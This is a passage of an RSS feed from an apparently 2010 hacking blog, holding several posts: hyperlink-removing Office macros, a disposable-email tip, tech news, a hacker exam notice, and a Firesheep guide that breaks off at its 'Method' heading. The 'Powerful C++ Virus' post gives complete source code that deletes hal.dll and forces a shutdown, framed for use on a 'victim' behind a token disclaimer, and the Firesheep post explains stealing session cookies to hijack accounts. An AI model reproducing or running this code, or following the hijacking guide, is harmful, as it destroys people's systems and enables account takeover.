src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqhZaXehTgZFo8JHNvAdn48IeavvGA4EE-O7wOGB1ZrWVgmR8bd_ClufyU5GslhXL-5crUVdZCPfrYyaFFrtHudv0wqLX8-zQQjHJAGMR2QTXLZwiUcSo2HRhG7mQv3F8HtP5yU8XvXQw/s1600/remove-paragraph-copied-ms-word-200X200%255B1%255D.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4 style=&quot;font-weight: normal; text-align: justify;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h4&gt;&lt;h4 style=&quot;font-weight: normal; text-align: justify;&quot;&gt;Ever copy and paste something from the Internet and then into Word only  to get the hyperlinks embedded? You can removed them easily with the  Macros below.&lt;/h4&gt;&lt;h4 style=&quot;font-weight: normal; text-align: justify;&quot;&gt;&lt;/h4&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Microsoft Word&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hit [ALT]+ [F11] to open the Visual Basic Editor&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Go to “Insert” &amp;gt; “Module” and in the pop-up window copy:&lt;/div&gt;&lt;blockquote&gt;&lt;code&gt;Sub RemoveHyperlinks()&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;Dim oField As Field&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;For Each oField In ActiveDocument.Fields&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;If oField.Type = wdFieldHyperlink Then&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;oField.Unlink&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;End If&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;Next&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;Set oField = Nothing&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;End Sub&lt;/code&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Then click “File” &amp;gt; Close and return to Microsoft Word&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You can now run the Macro in Word by going to:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Tools &amp;gt; Macro &amp;gt; Macro and then Run “RemoveAllHyperlinks”&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Microsoft Excel:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;You can do the same in an Excel Document:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hit [ALT]+[F11] to open the Visual Basic Editor&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Go to “Insert” &amp;gt; “Module” and in the pop-up window copy:&lt;/div&gt;&lt;blockquote&gt;&lt;code&gt;Sub RemoveHyperlinks()&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&#39;Remove all hyperlinks from the active sheet&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;ActiveSheet.Hyperlinks.Delete&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;End Sub&lt;/code&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Then click “File” &amp;gt; Close and return to Microsoft Excel&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You can now run the Macro in Excel by going to:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Tools &amp;gt; Macro &amp;gt; Macro and then Run “RemoveAllHyperlinks”, this will delete all URLS on the selected worksheet.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;h4 id=&quot;tweetandlike-heading&quot; style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/h4&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h4 style=&quot;font-weight: normal; text-align: justify;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h4&gt;</description><link>http://hackinverse.blogspot.com/2010/11/how-to-remove-all-hyperlinks-in-word-or.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqhZaXehTgZFo8JHNvAdn48IeavvGA4EE-O7wOGB1ZrWVgmR8bd_ClufyU5GslhXL-5crUVdZCPfrYyaFFrtHudv0wqLX8-zQQjHJAGMR2QTXLZwiUcSo2HRhG7mQv3F8HtP5yU8XvXQw/s72-c/remove-paragraph-copied-ms-word-200X200%255B1%255D.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-2221335189247032372</guid><pubDate>Sat, 20 Nov 2010 15:55:00 +0000</pubDate><atom:updated>2010-11-20T21:42:28.973+05:30</atom:updated><title>Powerful C++ Virus</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/_u_FPbAGnpWc/TOfvR3AbCNI/AAAAAAAAAJI/QHlMHF3tKss/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/_u_FPbAGnpWc/TOfvR3AbCNI/AAAAAAAAAJI/QHlMHF3tKss/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;This  is a powerful C++ virus, which deletes Hal.dll, something that is  required for startup. After deleting that, it shuts down, never to start  again.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: red; font-family: verdana; font-size: x-small; font-weight: bold;&quot;&gt;NOTE: FOR EDUCATIONAL PURPOSE ONLY.WE ARE NOT RESPONSIBLE FOR ANY FURTHER CONSEQUENCES. BE ETHICAL AND THINK LIKE A HUMAN...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: red; font-family: verdana; font-size: x-small; font-weight: bold;&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana; font-size: x-small; font-weight: bold;&quot;&gt;Warning: Do not try this on your home computer.&lt;/span&gt;&lt;br /&gt;
&lt;span id=&quot;fullpost&quot;&gt; &lt;span style=&quot;font-family: verdana;&quot;&gt;The Original Code:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;#include&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;#include&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;using namespace std;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;int main(int argc, char *argv[])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;span style=&quot;color: magenta; font-family: verdana; font-size: x-small; font-weight: bold;&quot;&gt;//BE SURE TO TAKE HEX#1 - HACKER&#39;S EXAM...&lt;/span&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; &lt;/span&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;system(“shutdown -s -r”);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;system(“PAUSE”);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;return EXIT_SUCCESS;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;span style=&quot;color: magenta; font-family: verdana; font-weight: bold;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Code:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;#include&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;#include&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;using namespace std;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;int main(int argc, char *argv[])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;system(“shutdown -s -r”);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;system(“PAUSE”);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;return EXIT_SUCCESS;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: verdana;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;The  second version would be more useful during times when you do not know  the victims default drive. It might be drive N: for all you know.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;color: magenta; font-family: verdana; font-weight: bold;&quot;&gt;BE SURE TO TAKE HEX#1 - HACKER&#39;S EXAM...&lt;/span&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; &lt;/span&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/11/powerful-c-virus.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_u_FPbAGnpWc/TOfvR3AbCNI/AAAAAAAAAJI/QHlMHF3tKss/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-8789074554301899869</guid><pubDate>Thu, 11 Nov 2010 06:42:00 +0000</pubDate><atom:updated>2010-11-11T13:16:15.543+05:30</atom:updated><title>HEX #1 - HACKERS EXAM</title><description>The HEX #1 started now &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
RULES:&lt;br /&gt;
1. TRY ON YOUR OWN.&lt;br /&gt;
2. SEND YOUR ANSWERS IN A PDF/DOC FILE.&lt;br /&gt;
3. YOUR FILE MUST HAVE THE FOLLOWING DETAILS: YOUR COMPLETE NAME, YOUR&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; OCCUPATION IF STUDENT THE COLLEGE, DEPARTMENT AND YEAR HAVE TO BE&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; MENTIONED.&lt;br /&gt;
4. YOUR DOCUMENT SHOULD BE NEAT AND SIMPLE.&lt;br /&gt;
5. YOUR DOCUMENT SHOULD ALSO HAVE YOUR EMAIL-ID&lt;br /&gt;
6. ONE CAN SEND THEIR DOCUMENT ANY NUMBER OF TIMES.BUT THE ONE SEND AT&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; LAST WILL BE TAKEN IN TO ACCOUNT.&lt;br /&gt;
7. Event duration is 15 days&lt;br /&gt;
8. YOU HAVE TO MAIL YOUR ANSWERS on or before 26th November 2010 12:00 noon to hackinverse@gmail.com&lt;br /&gt;
9. No e-mail will be accepted after the specified time. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.scribd.com/doc/41983360/Hex-1&quot; linkindex=&quot;18&quot; style=&quot;display: block; font: 14px Helvetica,Arial,Sans-serif; margin: 12px auto 6px; text-decoration: underline;&quot; target=&quot;_Blank&quot; title=&quot;View Hex #1 on Scribd&quot;&gt;Hex #1&lt;/a&gt; &lt;object data=&quot;http://d1.scribdassets.com/ScribdViewer.swf&quot; height=&quot;600&quot; id=&quot;doc_503715480731033&quot; name=&quot;doc_503715480731033&quot; style=&quot;outline: medium none;&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;100%&quot;&gt;  &lt;param name=&quot;movie&quot; value=&quot;http://d1.scribdassets.com/ScribdViewer.swf&quot;&gt;&lt;param name=&quot;wmode&quot; value=&quot;opaque&quot;&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#ffffff&quot;&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;&lt;param name=&quot;FlashVars&quot; value=&quot;document_id=41983360&amp;access_key=key-2kfwxzaaiv9xf0lgzjln&amp;page=1&amp;viewMode=list&quot;&gt;&lt;embed id=&quot;doc_503715480731033&quot; name=&quot;doc_503715480731033&quot; src=&quot;http://d1.scribdassets.com/ScribdViewer.swf?document_id=41983360&amp;access_key=key-2kfwxzaaiv9xf0lgzjln&amp;page=1&amp;viewMode=list&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; height=&quot;600&quot; width=&quot;100%&quot; wmode=&quot;opaque&quot; bgcolor=&quot;#ffffff&quot;&gt;&lt;/embed&gt; &lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also download the pdf file here:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://www.scribd.com/document_downloads/direct/41983360?extension=pdf&amp;amp;ft=1289457838&amp;amp;lt=1289461448&amp;amp;uahk=KE4mWuMEmFxQseNz0/VdaENzELs&quot; linkindex=&quot;19&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; target=&quot;_Blank&quot;&gt;&lt;br /&gt;
&lt;img border=&quot;0&quot; height=&quot;239&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmbyuTiBxIYbCdx_J2Q5oBg2mDc2tSPXx7R2sIb2vHkEAO8VfQSfWbieYPYiZGskIj1JpRug0svlGAFAUasDkrPwv2xlzz3z7yrXtFDZCsuxI55UqZTEhDIFh5mj0rcKL4nYMgSAijXY/s320/ScreenShot021.jpg&quot; width=&quot;320&quot; /&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/11/hex-1-hackers-exam.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmbyuTiBxIYbCdx_J2Q5oBg2mDc2tSPXx7R2sIb2vHkEAO8VfQSfWbieYPYiZGskIj1JpRug0svlGAFAUasDkrPwv2xlzz3z7yrXtFDZCsuxI55UqZTEhDIFh5mj0rcKL4nYMgSAijXY/s72-c/ScreenShot021.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-8487664766146557000</guid><pubDate>Tue, 09 Nov 2010 08:17:00 +0000</pubDate><atom:updated>2010-11-09T13:48:00.140+05:30</atom:updated><title>SOFTW4R3 UPD4T3 FOR W33K #2</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;h3 class=&quot;post-title entry-title&quot; style=&quot;font: 18px &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; margin: 0px; position: relative;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;Google To Compete Facebook with GoogleMe!&lt;/h3&gt;&lt;h3 class=&quot;post-title entry-title&quot; style=&quot;font: 18px &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; margin: 0px; position: relative;&quot;&gt;&lt;/h3&gt;&lt;h3 class=&quot;post-title entry-title&quot; style=&quot;font: 18px &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; margin: 0px; position: relative;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TNkCXM2CesI/AAAAAAAAAJA/GhEgKjiKkcQ/s1600/images+%25286%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TNkCXM2CesI/AAAAAAAAAJA/GhEgKjiKkcQ/s1600/images+%25286%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; line-height: 20px;&quot;&gt;Just when people have started loosing interest from Orkut and most of them have shifted to Facebook the two internet Giants, it appears that Google will attempt to pull the ground from under Facebook&#39;s feet, by launching a new social networking service of its own called &quot;Google Me&quot; and simultaneously rope in the famed services of Zynga, the social gaming developer of Facebook fame. This news comes after TechCrunch&#39;s reports that Google has pumped in between $100m to $200m into Zyngya.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; line-height: 20px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;post-title entry-title&quot; style=&quot;font: 18px &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; margin: 0px; position: relative;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; line-height: 20px;&quot;&gt;Do you have questions, comments, or suggestions? Feel free to post a comment!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/h3&gt;</description><link>http://hackinverse.blogspot.com/2010/11/softw4r3-upd4t3-for-w33k-2.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_u_FPbAGnpWc/TNkCXM2CesI/AAAAAAAAAJA/GhEgKjiKkcQ/s72-c/images+%25286%2529.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-5063966497012805755</guid><pubDate>Tue, 09 Nov 2010 08:06:00 +0000</pubDate><atom:updated>2010-11-09T13:36:18.874+05:30</atom:updated><title>Dipostable.com  - Dispostable email account !</title><description>&lt;a href=&quot;http://1.bp.blogspot.com/_u_FPbAGnpWc/TNkAyE9Y5wI/AAAAAAAAAI8/dlOsyOW_lsc/s1600/index.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/_u_FPbAGnpWc/TNkAyE9Y5wI/AAAAAAAAAI8/dlOsyOW_lsc/s1600/index.jpg&quot; /&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;Friends today I am going to tell you about an amazing website. Many of you don&#39;t like so much spam e-mail after you register for any website. But you have to give your email address &amp;amp; tolerate spam if you want to register. But&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://dispostable.com/&quot; style=&quot;color: #c63d84; text-decoration: none;&quot;&gt;dipostable.com&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/a&gt;is a great website. You don&#39;t need to create your email account here. Just give any name to email account&lt;i&gt;.for eg: 123@dispostable.com&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;and open it. So no need to register or tolerate with spam mail. Just while registering on any website give any name to your email address&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;i&gt;name@dispostable.com&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;then go to&lt;a href=&quot;http://dispostable.com/&quot; style=&quot;color: #c63d84; text-decoration: none;&quot;&gt; dispostable.com&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;and just give that name and open its mail account! Amazing isn&#39;t it?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #404040; font-family: &#39;Trebuchet MS&#39;,Trebuchet,sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;&lt;br /&gt;
Didn&#39;t go it? Visit&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.dispostable.com/&quot; style=&quot;color: #c63d84; text-decoration: none;&quot;&gt;www.dispostable.com&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;and you will understand everything!&lt;br /&gt;
&lt;br /&gt;
Do you have questions, comments, or suggestions? Feel free to post a comment!&lt;/span&gt;&lt;/span&gt;</description><link>http://hackinverse.blogspot.com/2010/11/dipostablecom-dispostable-email-account.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_u_FPbAGnpWc/TNkAyE9Y5wI/AAAAAAAAAI8/dlOsyOW_lsc/s72-c/index.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-2370123057126293840</guid><pubDate>Tue, 09 Nov 2010 06:45:00 +0000</pubDate><atom:updated>2010-11-09T12:15:42.622+05:30</atom:updated><title>Firesheep Makes Facebook Hacking Easy</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TNjuC_xuexI/AAAAAAAAAI4/GXoAmFsJ_Mw/s1600/Firesheep+1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TNjuC_xuexI/AAAAAAAAAI4/GXoAmFsJ_Mw/s1600/Firesheep+1.jpeg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Recently a new firefox addon Firesheep have been a cause of thousands of  email accounts, As reported by techcurnch, Firesheep has been  downloaded more than 104,000 times in roughly last 24 hours, With  Firesheep the hacker can control any account without even knowing the  username and password of the desired account, As Facebook is worlds most  popular Social Networking website, therefore it has been the major  victim of it, Firesheep uses Http Session hijacking attack to gain  unauthorized access to a Facebook or any other account&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;b&gt;What is Session Hijacking?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In a Http session hijacking attack an attacker steals victims cookies,  Cookies stores all the necessary Information about one’s account , using  this information you can hack anybody’s account and change his  password. If you get the Cookies of the Victim you can Hack any account  the Victim is Logged into i.e. you can hack Facebook Google, Yahoo,  Orkut, Flickr etc or any other email account&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How can a Hacker use Firesheep to Hack a Facebook or any other account?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;Public wifi access&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href=&quot;http://www.winpcap.org/install/default.htm&quot;&gt;winpcap&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Firesheep(&lt;a href=&quot;http://github.com/downloads/codebutler/firesheep/firesheep-0.1-1.xpi&quot;&gt;Download&lt;/a&gt;)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
